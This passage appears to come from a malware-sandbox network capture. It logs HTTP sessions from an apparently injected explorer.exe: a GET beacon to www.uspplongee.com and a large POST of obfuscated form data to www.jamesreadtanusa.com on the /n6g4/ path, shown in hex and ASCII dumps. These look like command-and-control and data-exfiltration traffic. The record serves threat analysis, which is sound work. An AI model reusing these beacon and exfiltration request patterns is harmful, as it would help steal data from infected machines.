KPMZ1bfdr(DuuwPU692hj38Ub1uQV9ZKzx6hei-qnM7dhZonE9lTP5EF3vklKwBCjAOtImYVX7d2p20MWdQZ57m32hQeDVVSuD3lS
May 14, 2022 15:30:40.467349052 CEST	9412	OUT	Data Raw: 35 72 61 43 31 7a 42 6b 58 33 79 6b 6e 6d 6f 33 33 5a 69 68 69 70 46 32 65 59 39 51 49 67 4d 7a 33 46 58 75 55 62 44 7a 39 57 71 69 77 4f 73 49 38 59 63 6c 42 63 75 72 71 47 36 45 77 69 52 4e 62 65 53 56 35 4c 42 47 57 76 6d 7a 46 70 36 56 65 6f Data Ascii: 5raC1zBkX3yknmo33ZihipF2eY9QIgMz3FXuUbDz9WqiwOsI8YclBcurqG6EwiRNbeSV5LBGWvmzFp6VeoKN3Ryn7XhkZd93d93IFCW2dFFtNpSTdK0sXIClYQAQ5coAEADjaZWP3A9JKqTlnbQW2P73uezMeCvkADY36baadp6trDJiPwLE10P8~QRAmb6Hm_nlEwkKoOrxqy5LK8RAw9TbaMZofDwxH3ys8wGHcT1fomBQuht
May 14, 2022 15:30:40.467437029 CEST	9419	OUT	Data Raw: 6d 4f 6d 44 71 6b 66 71 72 39 43 70 4e 48 44 72 6c 72 69 2d 64 63 6a 73 52 31 48 59 49 61 47 63 57 64 41 39 59 32 4d 42 6a 37 66 49 30 50 49 50 53 73 76 50 59 69 6b 78 75 51 28 36 77 36 37 4e 72 39 6c 30 30 49 65 30 51 38 4f 35 69 62 58 65 50 5f Data Ascii: mOmDqkfqr9CpNHDrlri-dcjsR1HYIaGcWdA9Y2MBj7fI0PIPSsvPYikxuQ(6w67Nr9l00Ie0Q8O5ibXeP_IAce9xU0CtGjrifSRTRBiiIC5KT7U-fxpI(_LDqpQoWtytxa5KG14bs3tYfQ(Uek0RN551pot4(CamV-(W8Hy9wtFWqxGaAuQmeBJ9Kcn3KLejVjhrJxzBdnTkNPp1~kZqmIB3cx5a2oTYC9cmc0kggco5MWzH8te
May 14, 2022 15:30:40.467586994 CEST	9427	OUT	Data Raw: 7e 34 54 6d 42 4a 71 52 56 55 51 52 31 4b 36 4b 62 69 42 59 39 53 34 49 32 34 57 70 55 33 35 75 77 67 66 2d 6b 4b 41 41 6f 35 57 45 48 48 49 44 38 49 68 78 48 76 53 36 43 49 32 6b 28 71 74 6e 6b 6b 44 39 75 42 28 52 41 42 75 78 28 6a 48 43 4e 70 Data Ascii: ~4TmBJqRVUQR1K6KbiBY9S4I24WpU35uwgf-kKAAo5WEHHID8IhxHvS6CI2k(qtnkkD9uB(RABux(jHCNp6lqgOB8TVGSjfl6AUNO1Ip7VjwWvgl3dR2OBJx2cwh3WVBu9ppRkWeVziih3ladQ~UBp4bDBwumDmRAaaXrWOO1nvLmbe3Q-zTUs7eGOE3nCSCV1qvLGVOoxbgn1ZEq-V4Ct(Ef8uUGnk80fsZJHy6YCc9wa0RlgI
May 14, 2022 15:30:40.467706919 CEST	9432	OUT	Data Raw: 33 75 65 6e 49 33 4a 4b 42 6e 7a 50 47 50 65 37 75 34 73 49 61 4f 30 30 4e 33 64 78 76 6c 41 49 62 78 33 74 75 79 48 5a 34 78 37 4c 64 35 59 4b 4a 68 43 48 63 41 79 2d 79 52 57 4a 7e 77 45 51 6b 33 34 53 32 52 6f 37 6e 78 35 4f 5a 4a 4e 59 6d 51 Data Ascii: 3uenI3JKBnzPGPe7u4sIaO00N3dxvlAIbx3tuyHZ4x7Ld5YKJhCHcAy-yRWJ~wEQk34S2Ro7nx5OZJNYmQH2AUFgdCpktLVxy9CVP8jlye6bOJWlGNOB66e98BFiilgoWGhC9H2M6iy8~FqjRXSlls0vhAPJnuQUmj1ce3LkX8cvj-5VS_ROJ2YFmTI140EnqexmZEBgamkBKgSkJulykl48cSSkCJRPANE5WZJFX07utNrAhlK

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.4	49799	38.34.163.59	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 14, 2022 15:30:40.467758894 CEST	9433	OUT	GET /n6g4/?3fe=YEAzGNA1BgiQpi8GImtX9JznxcWz/G0oG2K4jwCI3/8B8s5l+/t603YZPdD+BzgPPrJ7&r2MLI=tjrDPFcXi HTTP/1.1 Host: www.uspplongee.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 14, 2022 15:30:40.679183006 CEST	9435	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 May 2022 13:30:40 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 66 66 63 30 0d 0a ef bb bf 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 0a 0a 0a 3c 74 69 74 6c 65 3e e7 bb bf e5 9b ad e5 8c ba e6 ba 90 e9 87 8e e5 86 9c e6 9c ba e5 95 86 e5 ba 97 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 e7 bb bf e5 9b ad e5 8c ba e6 ba 90 e9 87 8e e5 86 9c e6 9c ba e5 95 86 e5 ba 97 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 e7 bb bf e5 9b ad e5 8c ba e6 ba 90 e9 87 8e e5 86 9c e6 9c ba e5 95 86 e5 ba 97 e3 80 82 22 20 2f 3e 0a 0a 3c 21 2d 2d 20 46 6f 6e 74 73 20 2d 2d 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 72 65 73 73 2b 53 74 61 72 74 2b 32 50 25 37 43 4c 61 74 6f 3a 31 30 30 2c 31 30 30 69 2c 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 39 30 30 2c 39 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 3c 21 2d 2d 20 4c 69 67 68 74 62 6f 78 20 73 74 79 6c 65 73 20 2d 2d 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 79 77 2f 32 33 36 32 2f 61 73 73 65 74 73 2f 6c 69 67 68 74 62 6f 78 32 2d 6d 61 73 74 65 72 2f 64 69 73 74 2f 63 73 73 2f 6c 69 67 68 74 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 3c 21 2d 2d 20 4c 6f 61 64 65 72 73 20 73 74 79 6c 65 73 20 2d 2d 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 79 77 2f 32 33 36 32 2f 61 73 73 65 74 73 2f 6c 6f 61 64 65 72 73 2e 63 73 73 2d 6d 61 73 74 65 72 2f 6c 6f 61 64 65 72 73 2e 6d 69 6e 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 0a 3c 21 2d 2d 20 54 65 6d 70 6c 61 74 65 20 73 74 79 6c 65 73 20 2d 2d 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 79 77 2f 32 33 36 32 2f 63 73 73 2f 79 65 6c 6c 6f 77 2e 6d 69 6e 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 74 69 74 6c 65 3d 22 79 65 6c 6c 6f 77 22 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 79 77 2f 32 33 36 32 2f 63 73 73 2f 70 69 6e 6b 2e 6d 69 6e 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 20 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 74 69 74 6c 65 3d 22 70 69 6e 6b 22 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 79 77 2f 32 33 36 32 2f 63 73 73 2f 6f 72 61 6e 67 65 2e 6d 69 6e 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 20 73 74 79 6c 65 73 Data Ascii: ffc0<!DOCTYPE html><html lang="en" class="no-js"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="keywords" content="" /><meta name="description" content="" />... Fonts --><link href="https://fonts.googleapis.com/css?family=Press+Start+2P%7CLato:100,100i,300,300i,400,400i,700,700i,900,900i" rel="stylesheet">... Lightbox styles --><link href="/templates/yw/2362/assets/lightbox2-master/dist/css/lightbox.min.css" rel="stylesheet">... Loaders styles --><link href="/templates/yw/2362/assets/loaders.css-master/loaders.min.css" media="screen" rel="stylesheet" type="text/css">... Template styles --><link href="/templates/yw/2362/css/yellow.min.css" media="screen" rel="stylesheet" type="text/css" title="yellow"><link href="/templates/yw/2362/css/pink.min.css" media="screen" rel="alternate stylesheet" type="text/css" title="pink"><link href="/templates/yw/2362/css/orange.min.css" media="screen" rel="alternate styles
May 14, 2022 15:30:40.679224968 CEST	9436	IN	Data Raw: 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 74 69 74 6c 65 3d 22 6f 72 61 6e 67 65 22 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 79 77 2f 32 33 36 32 2f 63 73 73 2f 72 65 64 2e 6d 69 6e 2e 63 Data Ascii: heet" type="text/css" title="orange"><link href="/templates/yw/2362/css/red.min.css" media="screen" rel="alternate stylesheet" type="text/css" title="red"><link href="/templates/yw/2362/css/green.min.css" media="screen" rel="alternate styles
May 14, 2022 15:30:40.679250002 CEST	9438	IN	Data Raw: 22 38 38 79 36 6b 72 22 3e 3c 2f 66 69 67 63 61 70 74 69 6f 6e 3e 3c 73 65 6c 65 63 74 20 69 64 3d 22 6a 72 6f 6c 72 38 22 3e 3c 2f 73 65 6c 65 63 74 3e 3c 6e 6f 73 63 72 69 70 74 20 69 64 3d 22 67 38 34 62 6c 34 22 3e 3c 2f 6e 6f 73 63 72 69 70 Data Ascii: "88y6kr"></figcaption><select id="jrolr8"></select><noscript id="g84bl4"></noscript><sup id="1f1eu9"></sup><samp id="dl3m92"></samp><s id="5v75lo"></s><style id="abksk3"></style><thead id="8u6lpe"></thead><details id="yt9jr0"></details><dialog
May 14, 2022 15:30:40.679270983 CEST	9439	IN	Data Raw: 63 6b 20 69 64 3d 22 76 77 61 7a 36 6f 22 3e 3c 2f 74 72 61 63 6b 3e 3c 63 61 70 74 69 6f 6e 20 69 64 3d 22 7a 35 33 76 6b 30 22 3e 3c 2f 63 61 70 74 69 6f 6e 3e 3c 66 69 65 6c 64 73 65 74 20 69 64 3d 22 35 72 69 38 78 66 22 3e 3c 2f 66 69 65 6c Data Ascii: ck id="vwaz6o"></track><caption id="z53vk0"></caption><fieldset id="5ri8xf"></fieldset><area id="2vkjhr"></area><legend id="c9rqhn"></legend><tr id="p3xdpd"></tr><caption id="9k5jpg"></caption><datalist id="js19f2"></datalist><dt id="bpjfig"><
May 14, 2022 15:30:40.679291964 CEST	9440	IN	Data Raw: 2f 64 61 74 61 6c 69 73 74 3e 3c 66 6f 72 6d 20 69 64 3d 22 39 61 78 32 76 70 22 3e 3c 2f 66 6f 72 6d 3e 3c 73 75 62 20 69 64 3d 22 61 65 79 74 36 37 22 3e 3c 2f 73 75 62 3e 3c 6f 70 74 67 72 6f 75 70 20 69 64 3d 22 70 37 61 65 35 39 22 3e 3c 2f Data Ascii: /datalist><form id="9ax2vp"></form><sub id="aeyt67"></sub><optgroup id="p7ae59"></optgroup><basefont id="xlm5iz"></basefont><progress id="bahk1b"></progress><li id="d8hjvn"></li><caption id="xwtn4q"></caption><strong id="8xk4oc"></strong><nofr
May 14, 2022 15:30:40.679315090 CEST	9442	IN	Data Raw: 09 3c 61 20 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 73 77 69 74 63 68 65 72 20 62 67 2d 70 69 6e 6b 22 20 64 61 74 61 2d 63 6f 6c 6f 72 3d 22 70 69 6e 6b 22 3e 3c 2f 61 3e 0a 09 09 3c 61 20 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 73 77 69 74 Data Ascii: <a class="color-switcher bg-pink" data-color="pink"></a><a class="color-switcher bg-red" data-color="red"></a><a class="color-switcher bg-green" data-color="green"></a><a class="color-switcher bg-blue" data-color="blue"></a></d
May 14, 2022 15:30:40.679337025 CEST	9443	IN	Data Raw: 6d 65 6e 75 2d 72 69 67 68 74 22 3e 0a 09 09 09 09 09 09 3c 6c 69 3e 0a 09 09 09 09 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 62 6f 78 22 20 61 63 74 69 6f 6e 3d 22 23 22 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 Data Ascii: menu-right"><li><form class="search-box" action="#"><div class="form-group has-feedback no-margin"><input type="text" class="form-control" placeholder="Search"><i class="fa fa-search form-control-fee
May 14, 2022 15:30:40.679361105 CEST	9444	IN	Data Raw: 73 73 3d 22 74 65 78 74 22 3e 53 69 67 6e 20 55 70 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 61 72 72 6f 77 2d 72 69 67 68 74 22 3e 3c 2f 69 3e 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 3c 2f 62 75 74 74 6f 6e 3e 0a 09 09 09 09 09 Data Ascii: ss="text">Sign Up <i class="fa fa-arrow-right"></i></span></button><p class="text-center"><a title="Reset password">Forgot your password?</a></
May 14, 2022 15:30:40.679384947 CEST	9446	IN	Data Raw: 09 09 09 09 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 67 61 6d 65 70 61 64 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6c 6f 72 22 3e 47 3c 2f 73 70 Data Ascii: <i class="fa fa-gamepad" aria-hidden="true"></i><span class="main-color">G</span>ame<span class="main-color">R</span></a>... Logo end --></div>... Main menu --><div class="collapse navbar-collapse" id="main-menu"><ul cla
May 14, 2022 15:30:40.679406881 CEST	9447	IN	Data Raw: 2f 2f 68 61 69 6c 65 6e 67 2e 75 73 70 70 6c 6f 6e 67 65 65 2e 63 6f 6d 2f 22 3e 47 65 74 74 69 6e 67 20 73 74 61 72 74 65 64 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 3c 6c 69 3e 0a 09 09 09 09 09 09 09 3c 61 20 68 72 Data Ascii: //haileng.uspplongee.com/">Getting started</a></li><li><a href="http://epa.uspplongee.com/">FAQ</a></li><li><a href="http://qunben.uspplongee.com/">Pricing</a></li><li><a href="
May 14, 2022 15:30:40.846191883 CEST	9451	IN	Data Raw: 3e 0a 09 09 09 09 09 09 09 73 74 61 79 20 69 6e 20 74 6f 75 63 68 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 0a 09 09 09 Data Ascii: >stay in touch</span></a><ul class="dropdown-menu"><li><a href="http://penjian.uspplongee.com/">Contact details</a></li><li><a href="http://zhanzen.uspplongee.com/">Map</a>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49775	35.209.127.155	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 14, 2022 15:30:16.643537998 CEST	7600	OUT	POST /n6g4/ HTTP/1.1 Host: www.jamesreadtanusa.com Connection: close Content-Length: 36477 Cache-Control: no-cache Origin: http://www.jamesreadtanusa.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.jamesreadtanusa.com/n6g4/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 33 66 65 3d 63 39 68 48 6f 53 58 72 56 73 48 69 39 4a 75 32 4d 32 55 77 35 5f 49 63 42 61 38 6d 54 53 32 6a 70 79 6b 54 68 4a 52 79 46 66 43 32 71 4f 7a 67 6a 73 69 6b 52 30 78 44 74 46 64 39 4c 67 61 67 73 56 4b 62 73 46 37 57 50 2d 43 65 35 70 63 6c 57 36 37 62 71 47 67 6d 42 4d 7a 54 48 76 45 4b 62 6e 6e 6a 76 44 62 6f 57 74 76 6d 47 76 70 59 66 67 49 43 32 43 39 2d 77 78 44 58 4d 71 6c 72 39 77 66 37 44 72 4d 4f 59 75 69 36 62 44 74 54 30 73 59 6e 37 4a 71 6b 53 72 6d 42 47 69 65 74 63 44 53 4f 6f 4f 31 33 52 77 76 64 72 43 56 4d 30 64 55 5f 35 56 32 70 77 46 71 64 69 57 39 66 49 45 73 42 39 30 76 4b 53 55 31 35 4b 54 72 7a 4c 47 66 33 77 65 45 56 37 4a 54 6e 44 78 6e 4c 73 45 4c 4a 61 70 33 49 41 64 46 4f 5a 5a 41 78 44 63 6b 79 77 56 69 43 56 58 6c 41 49 59 39 4c 52 66 62 47 43 43 45 5f 61 71 4c 62 71 5f 38 74 65 30 6e 57 49 45 68 37 28 44 6e 2d 62 77 28 61 30 6f 5a 4b 7e 73 41 6a 42 53 45 61 38 4f 33 47 7a 35 6d 69 4a 65 47 63 59 37 45 46 61 67 28 68 7e 37 31 30 37 79 65 4c 34 4d 79 33 62 39 68 74 54 68 57 54 54 4b 79 75 33 6d 62 78 70 5f 6c 4c 78 6a 4e 4c 76 55 4f 4f 37 69 34 46 74 77 68 43 44 69 4b 37 50 69 6a 78 38 72 73 46 49 6f 68 5a 36 66 48 4e 4d 4a 5a 2d 66 62 37 38 4c 6e 68 68 54 30 37 5f 41 66 41 56 32 64 35 31 77 56 55 44 35 6e 63 4a 66 35 66 61 35 65 46 4a 59 4e 4c 4b 74 6c 64 4d 28 72 53 6c 4d 39 75 41 48 55 50 48 70 59 30 4a 32 73 55 76 39 72 42 50 77 39 46 37 32 58 39 7a 55 37 38 59 76 38 4a 44 34 61 6b 45 42 67 6b 54 5a 32 64 55 4b 49 37 49 77 34 61 79 50 79 50 50 68 4e 65 69 52 4b 51 33 61 6f 4e 47 69 37 33 33 58 45 56 30 54 5a 33 4f 54 39 57 37 7a 4a 6e 31 67 77 49 4e 39 4b 41 4a 4a 72 79 46 7e 7a 47 74 4b 6b 76 61 76 54 56 35 75 42 4a 64 43 69 67 4d 77 4d 33 44 7e 57 6c 73 58 52 53 6d 70 6f 44 31 56 34 58 57 4e 71 43 46 34 50 43 59 36 4f 7a 79 42 58 7e 66 49 4d 42 71 7a 71 31 32 52 38 72 43 6d 6a 78 4a 6d 42 46 6d 6e 4c 48 4c 49 79 59 57 48 79 4f 57 59 75 32 31 45 4f 6e 67 33 36 49 4e 72 38 75 49 73 4b 61 52 78 48 51 4b 37 4b 55 73 46 34 54 58 33 4f 38 4d 5a 30 6d 63 75 39 53 67 37 37 37 56 4e 30 36 30 35 54 45 6d 36 54 51 42 64 4f 5a 53 31 63 41 6e 6c 48 38 41 32 4a 44 38 4e 4c 58 4f 75 36 5a 42 52 4b 75 4c 68 35 69 66 43 49 4a 71 68 34 4b 76 66 71 37 4d 42 7a 69 64 4f 48 76 4e 62 65 50 33 35 53 45 55 56 64 46 46 52 5f 77 77 51 71 4d 61 54 72 30 32 52 30 69 45 53 2d 52 64 61 41 48 32 76 72 65 31 44 43 34 71 44 66 6d 67 79 6e 65 5f 58 57 39 51 35 75 56 4b 51 77 41 33 53 35 47 50 44 50 5a 34 4c 72 79 77 61 49 44 2d 74 43 42 68 71 75 72 36 6f 78 50 76 4a 68 48 37 34 74 4d 32 39 65 77 68 73 47 38 4f 48 36 28 7a 48 65 53 4a 7e 58 37 5f 69 50 6a 4c 57 4e 50 67 57 5f 78 67 42 6a 76 30 38 68 47 5f 35 61 45 71 68 59 46 56 44 6b 61 46 44 31 76 65 46 32 44 75 37 6f 51 6e 66 2d 6e 2d 41 68 43 52 48 79 56 77 59 6e 6c 57 4d 77 63 4e 62 67 53 4c 4f 61 35 30 52 74 70 72 34 67 49 46 7a 6d 61 6c 45 4e 59 57 32 7a 79 2d 66 38 48 53 47 4d 34 44 56 68 4d 43 5a 74 58 34 53 59 78 69 68 63 45 4a 74 5a 28 47 74 6d 74 51 75 36 61 50 6e 70 45 47 4d 78 41 71 46 31 73 55 56 53 6d 53 7e 6f 4a 70 39 74 33 69 64 32 34 55 6a 30 42 55 6d 4a 78 66 51 75 5a 5f 58 48 38 37 33 35 43 6e 75 51 4c 4b 30 44 76 62 63 32 70 71 46 54 6b 75 62 39 75 4b 54 4b 65 76 49 75 4b 70 69 79 4b 76 33 6e 38 46 65 6e 70 38 73 6e 67 68 70 53 33 6b 79 52 31 4b 5a 71 6a 31 43 39 68 71 37 61 34 71 65 59 77 42 55 6e 77 69 36 43 37 4c 50 47 59 78 68 61 79 74 35 6d 30 6c 36 5a 79 37 6f 6f 61 65 41 36 78 56 7a 47 48 47 4d 53 6d 55 70 75 5a 45 76 78 56 44 62 4c 68 6e 6c 56 37 6c 67 73 62 71 72 7a 49 57 7e 4d 62 54 50 47 36 56 52 49 28 49 5a 68 43 67 59 6e 35 6d 56 36 6f 48 38 49 78 47 66 41 43 49 6b 4f 77 43 53 74 30 6e 4c 69 78 46 68 59 28 7a 67 6d 66 6e 69 75 78 43 57 48 36 6d 43 65 51 4d 72 4c 6d 53 58 6b 33 45 71 4e 75 64 47 55 33 6c 48 67 59 4a 50 6a 70 69 38 6d 79 53 6c 64 4e 74 68 4e 46 6f 45 77 62 4a 79 63 64 6b 39 53 6b 76 6c 6c 46 31 38 59 41 4a 4a 49 58 6f 35 2d 43 44 31 6a 7e 64 4f 30 61 30 33 61 42 49 54 4f 35 32 48 5f 28 4d 44 30 71 73 4c 42 51 42 70 69 4d 33 4f 49 47 5a 49 34 4f 31 62 4b 38 51 4c 45 57 47 6e 6c 4b 6b 37 38 61 70 50 55 53 Data Ascii: 3fe=c9hHoSXrVsHi9Ju2M2Uw5_IcBa8mTS2jpykThJRyFfC2qOzgjsikR0xDtFd9LgagsVKbsF7WP-Ce5pclW67bqGgmBMzTHvEKbnnjvDboWtvmGvpYfgIC2C9-wxDXMqlr9wf7DrMOYui6bDtT0sYn7JqkSrmBGietcDSOoO13RwvdrCVM0dU_5V2pwFqdiW9fIEsB90vKSU15KTrzLGf3weEV7JTnDxnLsELJap3IAdFOZZAxDckywViCVXlAIY9LRfbGCCE_aqLbq_8te0nWIEh7(Dn-bw(a0oZK~sAjBSEa8O3Gz5miJeGcY7EFag(h~7107yeL4My3b9htThWTTKyu3mbxp_lLxjNLvUOO7i4FtwhCDiK7Pijx8rsFIohZ6fHNMJZ-fb78LnhhT07_AfAV2d51wVUD5ncJf5fa5eFJYNLKtldM(rSlM9uAHUPHpY0J2sUv9rBPw9F72X9zU78Yv8JD4akEBgkTZ2dUKI7Iw4ayPyPPhNeiRKQ3aoNGi733XEV0TZ3OT9W7zJn1gwIN9KAJJryF~zGtKkvavTV5uBJdCigMwM3D~WlsXRSmpoD1V4XWNqCF4PCY6OzyBX~fIMBqzq12R8rCmjxJmBFmnLHLIyYWHyOWYu21EOng36INr8uIsKaRxHQK7KUsF4TX3O8MZ0mcu9Sg777VN0605TEm6TQBdOZS1cAnlH8A2JD8NLXOu6ZBRKuLh5ifCIJqh4Kvfq7MBzidOHvNbeP35SEUVdFFR_wwQqMaTr02R0iES-RdaAH2vre1DC4qDfmgyne_XW9Q5uVKQwA3S5GPDPZ4LrywaID-tCBhqur6oxPvJhH74tM29ewhsG8OH6(zHeSJ~X7_iPjLWNPgW_xgBjv08hG_5aEqhYFVDkaFD1veF2Du7oQnf-n-AhCRHyVwYnlWMwcNbgSLOa50Rtpr4gIFzmalENYW2zy-f8HSGM4DVhMCZtX4SYxihcEJtZ(GtmtQu6aPnpEGMxAqF1sUVSmS~oJp9t3id24Uj0BUmJxfQuZ_XH8735CnuQLK0Dvbc2pqFTkub9uKTKevIuKpiyKv3n8Fenp8snghpS3kyR1KZqj1C9hq7a4qeYwBUnwi6C7LPGYxhayt5m0l6Zy7ooaeA6xVzGHGMSmUpuZEvxVDbLhnlV7lgsbqrzIW~MbTPG6VRI(IZhCgYn5mV6oH8IxGfACIkOwCSt0nLixFhY(zgmfniuxCWH6mCeQMrLmSXk3EqNudGU3lHgYJPjpi8mySldNthNFoEwbJycdk9SkvllF18YAJJIXo5-CD1j~dO0a03aBITO52H_(MD0qsLBQBpiM3OIGZI4O1bK8QLEWGnlKk78apPUSbfHkcn4HMqfHveasW88Mu8mswC9kwCXR48ETsWOxiT56fTtNN2IVOhKKkRYUrap3-CMxuw9OUJhfDa9jg3Mp0fv1NbgDTrcysB8(go5bjxNWwztj8QNruKIlKFu6PHRsapuW2YLYeOb2otsRjtUMTJ2OOCJW2PsEJqxnUFMXNfXIbygm65UCrx8d9Nc5af11amfX32OXnRqOZhjgF6zjLJl~B2_CyXVhumkTuSRd1wI1Q36NDuCEHrK43fAIGyF7Q0xQzR6(9FytKk2FYia9fE8ppZIvqxw(7d0zWhWapyqvZgB5EzSVCkmqUrw9rM-uli_dqTWgx7rCZhSE9OZX78J7LASn97C6RCI00jyCDV9QzoTd9diBgrdltBVaBwdK5SiAgt55GVPWUaESEy0M4upMV0qaejchjp-(8fiA7wYfkJS8KVm6w4wmusFN1jjRADlhY5kE14boPOjFWQzlS0vmdVIc1oK3hlybr2sqjEYzMqvdksS175OKSwn(-jSpolsRgoXgU8tT4a19-qKOElw69KKKQxLO0oKoqbOkQeDHREUxRYfvjNkT-nX(YDgq9X1nDs-Srb6KK9Xn1eM5q1rieDijKmIHxJbyuVd15RLHB8_grS4vJL8EB0-LDC_uKUJc5PISBQULxdXIEmLCgYGrGF04-pqtC5QaPrCa3y2Fveg0qQY~NnTfynDUyRcZsyPCIw82U3uo4GMWbtDRY6pzo~jRqw2pC9jR_pELoaBztQNgNKnvTSn6D8PCeU1ZmwWyK0gvqEhrjAe1cBTwnHhrFosRgrGiiTqIK4uDYZvuxw0LTPJGM9hkcywNKTzdntneZ9Hm94uiKYZN3Es~9YcQINvx3FHrKgJpmdUb-qTtfXqLrX3FBXO3imMJj2amuAws3ofcorh9Vwak_t2yiE4WC9DbenLLvAyNK(M63fN9xt5mlzBl1HvwmECRZa8wcZwyJekGT(3cufIJFyhAgKDY1n324IgNKZnM_liNEtLubDM7A9DX4y7ydaBsMpVc0iL3G0FHXtG3i1p9U9MXZl2iF5dInJXLTk-dLM_yDl0yWhaKWE8NW7wL2aMnWniULRTV2xTEs~nU8S4rk2SScnHlvlxRaxY9IXxTbOIvAPzkfwgkUftfXawfux-C5UmkTZbG1cH(U5M4dbR(RYpdIH4t1v8MBxWA9NVWYuiAkgvxE9GcAwTfORrE_(esqqmqzmzUQ74Eoj4MncxzDnuitKWFZPqZW2sxrbhPEalfaLvNCtZxWmUYzNDS2AanmS0mxpuZ0S0xDbIShyXEaQLFMqE70jIvFtlQc(Sj2hW7U6EV0rb959VGIzLDxJSa1CH8UEP~W0cz36347zTAaT0TONm6QivHJF8Fu6t2QEpBniWg_Es4xhxXsBVvf5xU6O57SvYDsR5xVVBPoS6WNJd(ozaFVqjRxy4~eGlXkNwy7M_i2AWJnsz2bUTmIOZHA6ZKlCLJW3vZJPM2rcy4JMuv23dt66Iu79G0l4qkzFW4yCLBw0aAe31GfB5kv1QAZQWeNm9FBTVVny9vB4m3AORLwaxL4Vw1gEXlQFj(Ki4xc~sSv9dzlUFN9t1GQT0079yl5R3L7zR(mTjqO2Hi0HuBdf5uedSy5ayWozivZ0jwGEN